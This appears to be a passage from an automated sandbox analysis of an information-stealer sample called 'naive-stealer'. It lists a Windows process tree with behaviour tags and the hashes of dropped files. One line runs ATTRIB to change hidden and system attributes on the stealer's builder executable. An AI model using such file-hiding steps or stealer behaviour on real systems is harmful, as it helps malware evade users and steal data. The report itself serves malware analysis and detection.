C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Views/modifies file attributes
PID:5240
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3796
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4076
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4148
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4352
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:976
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4204
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:2668
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3308
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:4504
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 87d4b16173db5bcf2e3d6a477e70a004 9DfgcGP1gEO8fhm2owkT6A.0.1.0.0.01⤵PID:3552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1196
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:1936
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:3388
-
C:\Windows\System32\smartscreen.exeC:\Windows\System32\smartscreen.exe -Embedding1⤵PID:4632
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4560
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3856
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5920
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
445KB
MD52e5a8590cf6848968fc23de3fa1e25f1
SHA1801262e122db6a2e758962896f260b55bbd0136a
SHA2569785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3
SHA5125c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8
-
Filesize
3KB
MD54838ee953dab2c7a1bf57e0c6620a79d
SHA18c39cd200f9ffa77739ff686036d0449984f1323
SHA25622c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d
SHA512066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76
-
Filesize
3KB
MD58e64ab95d5d2c4c1e7a757624cb1fffa
SHA19889f93ad60bacb07683b4a23c40aa32954646d8
SHA256dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6
SHA5123ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c
-
Filesize
3KB
MD5c6086d02f8ce044f5fa07a98303dc7eb
SHA16116247e9d098b276b476c9f4c434f55d469129c
SHA2568901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA5121876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize
3KB
MD539b9eb9d1a56bc1792c844c425bd1dec
SHA1db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize
2KB
MD54ac1741ceb19f5a983079b2c5f344f5d
SHA1f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA2567df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11